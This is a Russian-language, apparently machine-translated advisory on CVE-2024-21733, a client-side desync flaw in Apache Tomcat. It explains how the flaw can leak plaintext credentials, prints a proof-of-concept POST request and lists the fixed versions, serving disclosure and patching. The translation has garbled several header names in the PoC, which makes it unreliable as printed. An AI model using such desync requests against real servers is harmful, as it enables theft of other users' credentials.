описания
Программное обеспечение Apache Tomcat® - это реализация с открытым исходным кодом Jakarta Servlet, Jakarta Server Pages, Jakarta Expression Language, Jakarta WebSocket, Jakarta Annotations и Jakarta Authentication Specification. Спецификация аутентификации.
Apache Tomcat с версии 8.5.7 по 8.5.63 и с версии 9.0.0-M11 по 9.0.43 уязвим к атакам десинхронизации на стороне клиента (CSD).
влиять (обычно негативно)
Уязвимость, связанная с де-синхронизацией на стороне клиента (CSD), возникает, когда веб-сервер не может точно обработать длину содержимого POST-запроса. Используя эту проблему, злоумышленник может манипулировать браузером жертвы, чтобы вызвать неправильное отключение от веб-сайта. Такая манипуляция может привести к несанкционированному извлечению конфиденциальных данных из соединений сервера и клиента.
Серьезность последствий зависит от приложения, использующего Tomcat в качестве внутреннего веб-сервера, что может привести к раскрытию конфиденциальной информации, такой как учетные данные в открытом виде. Например, наша команда обнаружила в версии портала ADSelfService Plus компании ManageEngine, предшествующей версии 6304, случай, когда можно было тайно получить учетные данные Active Directory в открытом виде из клиентского соединения, как показано ниже.
PoC / Exploit
POST / HTTP/1.1
Хост: имя хоста
Sec-Ch-Ua: "Chromium";v="119″, "Not?A_Brand";v="24″
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux".
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, как Gecko) Chrome/119.0.6045.159 Safari/537.36
Принять: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3; д=0,7
Sec-Fetch-Site: нет
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Приоритет: u=0, i
Соединение: keep-alive
Content-Length: 6
Content-Type: application/x-www-form-urlencoded
Икс
Рецепт
Пользователям затронутых версий следует принять одну из следующих мер:
Обновление до Apache Tomcat 9.0.44 или более поздней версии
Обновление до Apache Tomcat 8.5.64 или более поздней версии
Источник: xer0dayz из Sn1perSecurity LLC ответственно сообщил об этой уязвимости команде безопасности Tomcat.
История: 2024-01-19 Оригинальное сообщение
Полный текст бюллетеня безопасности: https://lists.apache.org/thread/h9bjqdd0odj6lhs2o96qgowcc6hb0cfz
библиография
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21733
https://tomcat.apache.org/security-9.html
https://tomcat.apache.org/security-8.html
https://portswigger.net/research/browser-powered-desync-attacks
https://hackerone.com/reports/2327341
Оригинальная статья написана Chief Security Officer, при воспроизведении просьба указывать: https://cncso.com/ru/cve-2024-21733-apache-tomcat-http-request-smuggling-html.